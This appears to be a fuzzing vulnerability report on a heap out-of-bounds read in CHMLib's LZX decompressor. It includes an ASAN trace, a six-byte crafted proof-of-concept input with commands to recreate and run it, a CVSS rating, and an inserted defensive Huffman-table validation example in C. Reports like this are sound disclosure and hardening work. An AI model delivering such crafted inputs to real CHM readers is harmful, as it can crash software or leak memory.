Location
src/lzx.c:634 in LZXdecompress() — LZX_BLOCKTYPE_ALIGNED handler.
case LZX_BLOCKTYPE_ALIGNED:
while (this_run > 0) {
READ_HUFFSYM(MAINTREE, main_element); // <-- LINE 634
...
Root Cause
The READ_HUFFSYM(MAINTREE, main_element) at line 634 accesses the MAIN
Huffman decode table (pState->MAINTREE_table) using a table index computed
from PEEK_BITS(LZX_MAINTREE_TABLEBITS). When the MAIN tree table was built
from crafted code-length data (provided earlier in the compressed stream), the
table can contain entries that cause the decoder to access indices far beyond
the allocated table array.
This is a heap Out-of-Bounds Read from the MAIN tree Huffman decode table.
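The defensive counterpart to this root cause is to validate the code-length data before it is turned into a decode table, and to make the lookup itself unable to index past the array. The following is an added example, not CHMLib code: a simplified canonical-Huffman direct-lookup table that rejects over-subscribed length sets (Kraft sum greater than 1) and lengths longer than the table index width, range-checks every table write, and masks the peeked bits on lookup. Unlike the real LZX decoder it handles only codes no longer than the table index width; the function and type names are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define HUFF_MAX_BITS 16

/* One direct-lookup slot: the decoded symbol and its code length.
 * len == 0 marks a slot that no code maps to (an invalid bit pattern). */
struct huff_entry {
    uint16_t sym;
    uint8_t  len;
};

/* Reject code-length sets that are over-subscribed (Kraft sum > 1) or that
 * use lengths longer than the table can index. Crafted lengths of this kind
 * are what let a decode table end up with entries outside the array. */
int huff_lengths_valid(const uint8_t *lens, size_t nsyms, unsigned tablebits)
{
    unsigned count[HUFF_MAX_BITS + 1] = {0};
    if (tablebits == 0 || tablebits > HUFF_MAX_BITS) return 0;
    for (size_t i = 0; i < nsyms; i++) {
        if (lens[i] > tablebits) return 0;
        count[lens[i]]++;
    }
    /* Integer form of the Kraft inequality: the sum of 2^(tablebits - len)
     * over all coded symbols must not exceed 2^tablebits. */
    uint64_t used = 0;
    for (unsigned l = 1; l <= tablebits; l++)
        used += (uint64_t)count[l] << (tablebits - l);
    return used <= ((uint64_t)1 << tablebits);
}

/* Build a canonical-Huffman direct lookup table of 1 << tablebits slots,
 * indexed by the next tablebits input bits (most significant bit first).
 * Every write is range-checked; returns 0 on success, -1 on rejected input. */
int huff_build_table(struct huff_entry *table, unsigned tablebits,
                     const uint8_t *lens, size_t nsyms)
{
    unsigned count[HUFF_MAX_BITS + 1] = {0};
    unsigned next_code[HUFF_MAX_BITS + 1] = {0};
    size_t tsize = (size_t)1 << tablebits;

    if (!huff_lengths_valid(lens, nsyms, tablebits) || nsyms > UINT16_MAX)
        return -1;
    memset(table, 0, tsize * sizeof *table);

    for (size_t i = 0; i < nsyms; i++) count[lens[i]]++;
    count[0] = 0;                      /* length 0 means "symbol unused" */
    /* Canonical code assignment: shorter codes first, ascending by symbol. */
    unsigned code = 0;
    for (unsigned l = 1; l <= tablebits; l++) {
        code = (code + count[l - 1]) << 1;
        next_code[l] = code;
    }
    for (size_t s = 0; s < nsyms; s++) {
        unsigned l = lens[s];
        if (l == 0) continue;
        unsigned c = next_code[l]++;
        size_t start = (size_t)c << (tablebits - l);  /* first slot for this code */
        size_t span  = (size_t)1 << (tablebits - l);  /* slots sharing this prefix */
        if (start + span > tsize) return -1;          /* defensive: unreachable after the Kraft check */
        for (size_t k = 0; k < span; k++) {
            table[start + k].sym = (uint16_t)s;
            table[start + k].len = (uint8_t)l;
        }
    }
    return 0;
}

/* Decode one symbol from the next tablebits peeked bits. The index is masked
 * to the table size, so the lookup can never read past the array even if the
 * peek value carries stray high bits. Returns the symbol and stores its code
 * length, or returns -1 for a bit pattern that no code maps to. */
int huff_decode(const struct huff_entry *table, unsigned tablebits,
                unsigned peek, unsigned *len_out)
{
    unsigned idx = peek & ((1u << tablebits) - 1u);
    if (table[idx].len == 0) return -1;
    *len_out = table[idx].len;
    return table[idx].sym;
}

int main(void)
{
    /* Constructed sample input: 4 symbols with lengths 2,1,3,3 (a complete
     * code) and an over-subscribed set 1,1,1 that must be rejected. */
    static const uint8_t good[] = {2, 1, 3, 3};
    static const uint8_t bad[]  = {1, 1, 1};
    struct huff_entry table[1 << 3];
    unsigned len;
    printf("good lengths valid: %d\n", huff_lengths_valid(good, 4, 3));
    printf("bad lengths valid:  %d\n", huff_lengths_valid(bad, 3, 3));
    if (huff_build_table(table, 3, good, 4) == 0) {
        int sym = huff_decode(table, 3, 5 /* bits 101 */, &len);
        printf("peek 101 -> symbol %d, length %u\n", sym, len);
    }
    return 0;
}
```

The two properties that matter here are independent: the Kraft check keeps a crafted length set from producing more table entries than slots exist, and the mask in huff_decode bounds the index regardless of what the bit reader hands in, so neither a malformed tree nor a bit-reader bug can turn into a read outside the table.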
ASAN Trace
==1520196==ERROR: AddressSanitizer: SEGV on unknown address 0x52a00002fe62
(pc 0x5618c97e836d bp 0x000000000010 sp 0x7ffc2dc5a1d0 T0)
==1520196==The signal is caused by a READ memory access.
#0 0x5618c97e836d in LZXdecompress src/lzx.c:634
#1 0x5618c97e174c in main /home/ubuntu/fuzzing/CHMLib/harness_lzx.c:34
SUMMARY: AddressSanitizer: SEGV src/lzx.c:634 in LZXdecompress
The crash address 0x52a00002fe62 contains the ASAN heap redzone marker
0x52a, indicating a read beyond a heap-allocated object (the Huffman table).
PoC
File: 6 bytes, triggers OOB heap read at src/lzx.c:634
Hex dump
00000000: 72 ff 2f fe ee 11 r./...
# Recreate the PoC binary from the hex dump above (all 6 bytes)
echo "72 ff 2f fe ee 11" | xxd -r -p > poc.bin
# Run with ASAN
AFL_USE_ASAN=1 /fuzzer_lzx < poc.bin
- Byte 0 (0x72): window_bits = 0x72 % 20 + 1 = 3 → window_size = 8
- Bytes 1-5: Crafted LZX compressed data that corrupts the MAIN tree table
during the BUILD_TABLE(MAINTREE) phase
Severity: HIGH (CVSS 7.5)
- AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- Remote-exploitable via crafted CHM file
- Heap OOB read can leak sensitive memory contents
- No authentication required; attacker controls the entire compressed stream